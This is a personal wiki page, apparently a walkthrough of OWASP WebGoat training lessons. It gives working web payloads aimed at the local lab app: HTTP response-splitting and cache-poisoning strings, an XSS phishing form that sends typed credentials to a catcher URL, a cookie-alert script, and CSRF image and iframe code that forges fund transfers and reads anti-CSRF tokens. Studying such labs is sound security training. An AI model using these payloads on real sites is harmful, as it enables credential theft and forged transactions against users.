Xiaopei's DokuWiki

These are the good times in your life,
so put on a smile and it'll be alright

User Tools

Site Tools


it:secure:owasp:webgoat_hack

WebGoat 攻略

辅助工具:

General

Http Basics

This lesson presents the basics for understanding the transfer of data between the browser and the web application.

solution

type something and submit and 使用 WebScarab 或者 Firebug/Tamper Data 查看/拦截 HTTP 请求

HTTP Splitting

有跳转, 并且跳转地址会附带用户输入参数的地方需要注意此漏洞

The attacker passes malicious code to the web server together with normal input. A victim application will not be checking for CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.

The effect of an HTTP Splitting attack is maximized when accompanied with a Cache Poisoning. The goal of Cache Poisoning attack is to poison the cache of the victim by fooling the cache to believe that the page hijacked using the HTTP splitting is a good one and it is indeed the server's copy.

The attack happens using the HTTP Splitting attack plus adding the Last-Modified: header and setting it to a future date. This will force the browser to send If-Modified-Since request header, which gives the attacker the chance to intercept the server's reply and replace it with a '304 Not Modified' reply.

solution

HTTP Splitting attacks
  1. 构造一段 Response
    en
    Content-Length: 0
    
    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Length: 19
    <html>Hacked</html>
  2. URL encode, Use CR (%0d) and LF (%0a) for a new line in Windows and only LF (%0a) in Linux
    en%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2019%0A%3Chtml%3EHacked%3C%2Fhtml%3E
elevate HTTP Splitting to Cache Poisoning
  1. 在上述 Response 中增加未来的 Last-Modified
    en
    Content-Length: 0
    
    HTTP/1.1 200 OK
    Content-Type: text/html
    Last-Modified: Mon, 27 Oct 2090 08:00:00 GMT
    Content-Length: 19
    <html>Hacked</html>
  2. URL encode
    en%0AContent-Length%3A+0%0A%0AHTTP/1.1+200+OK%0AContent-Type%3A+text/html%0ALast-Modified%3A+Mon%2C+27+Oct+2090+08%3A00%3A00+GMT%0AContent-Length%3A+19%0A%3Chtml%3EHacked%3C/html%3E

Cross-Site Scripting (XSS)

Phishing

如果目标网站存在 XSS 漏洞, 就可以通过注入表单实现钓鱼. 要点如下:

  1. 注入表单要像回事
  2. 表单提交可使用
    var XSSImage=new Image; 
    XSSImage.src="http://localhost:8080/webgoat/catcher?PROPERTY=yes&user=" + this.form.username.value + 
                 "&password=" + this.form.username.value";

solution

<br>
<br>
<hr>
<form>
  <H3>This feature requires account login:</H3 >
  <br>
  <br>
  Enter Username:<br>
  <input type="text" id="user" name="user"><br>
  Enter Password:<br>
  <input type="password" id="pass" name="pass"><br>
  <input type="submit" name="login" value="login" 
         onclick="var XSSImage=new Image; 
                  XSSImage.src='http://127.0.0.1:8080/webgoat/catcher?PROPERTY=yes&u=' + 
                               document.getElementById('user').value + '&p=' + document.getElementById('pass').value;">
</form>
<br>
<br>
<hr>
<script>alert(document.cookie)</script>

https://www.owasp.org/index.php/HTTPOnly

HttpOnly is an additional flag included in a Set-Cookie HTTP response header. Using the HttpOnly flag when generating a cookie helps mitigate the risk of client side script accessing the protected cookie (if the browser supports it). As a result, even if a cross-site scripting (XSS) flaw exists, and a user accidentally accesses a link that exploits this flaw, the browser (primarily Internet Explorer) will not reveal the cookie to a third party.

破解 HTTPOnly 的方法: TRACE

An XST (Cross-Site Tracing) attack involves the use of XSS and the HTTP TRACE function. HTTP TRACE is a default function in many webservers, primarily used for debugging. The client sends an HTTP TRACE with all header information including cookies, and the server simply responds with that same data. If using Javascript or other methods to steal a cookie or other information is disabled through the use of an “httpOnly” cookie or otherwise, an attacker may force the browser to send an HTTP TRACE request and send the server response to another site. “httpOnly” is an extra parameter added to cookies which hides the cookie from the script (supported in most, but not all browsers). For example “javascript:alert(document.cookie)” would not show an httpOnly cookie.

This type of attack can occur when the there is an XSS vulnerability and the server supports HTTP TRACE.

Cross Site Request Forgery (CSRF)

CSRF 的目的是让用户执行不知情的操作. 执行不知情的操作这件事可以用加载图片完成(that's why gmail doesn't load images by default).

<img src="http://localhost:8080/webgoat/attack?Screen=81&menu=210&transferFunds=5000" 
     width="1" height="1" />

CSRF Prompt By-Pass

如果得一个连招(连续的先后请求)才能完成, 则可在第一个 <img> 中用 onerror 来实现:

<img src="http://localhost:8080/webgoat/attack?Screen=81&menu=210&transferFunds=5000"
     onerror="document.getElementById('image2')
                      .src='http://localhost:8080/webgoat/attack?Screen=81&menu=210&transferFunds=CONFIRM'"
     width="1" height="1" />
<img id="image2" width="1" height="1" />

CSRF Token By-Pass

如果需要更复杂的连招(连续的先后请求, 后一请求依赖前请求的信息), 则可用 <iframe>

<script>
var tokenvalue;
 
function readFrame1()
{
    var frameDoc = document.getElementById("frame1").contentDocument;
    var form = frameDoc.getElementsByTagName("form")[1];
    var token = form.CSRFToken.value;
    tokenvalue = '&CSRFToken='+token;
 
    loadFrame2();
}
 
function loadFrame2()
{
    var testFrame = document.getElementById("frame2");
    var sssrc="http://localhost:8080/webgoat/attack?Screen=78&menu=900&transferFunds=4000"+tokenvalue;
    testFrame.src=sssrc
}
</script>
<iframe	src="http://localhost:8080/webgoat/attack?Screen=78&menu=900&transferFunds=main"
	onload="readFrame1();"
	id="frame1" frameborder="1" marginwidth="0"
	marginheight="0" width="800" scrolling=yes height="300"></iframe>
<iframe id="frame2" frameborder="1" marginwidth="0"
	marginheight="0" width="800" scrolling=yes height="300"></iframe>
</html>

iframe

Access Control Flaws

Using an Access Control Matrix

遍历看各个用户都有什么角色/权限, 以确定攻击目标

Bypass a Path Based Access Control Scheme

access a file that is not in the listed directory

Bypass Business Layer Access Control

有的功能可能只是界面按权限做了隐藏, 而业务层未做权限过滤

Breaking Data Layer Access Control

按 ID 访问的数据可能未对谁能访问哪些数据做限制

Remote Admin Access

尝试进入网站的管理界面, 程序级别的如 wordpress 的 wp-admin.php, 服务器级别的如 tomcat 的 admin

it/secure/owasp/webgoat_hack.txt · Last modified: 2013/08/19 07:22 (external edit)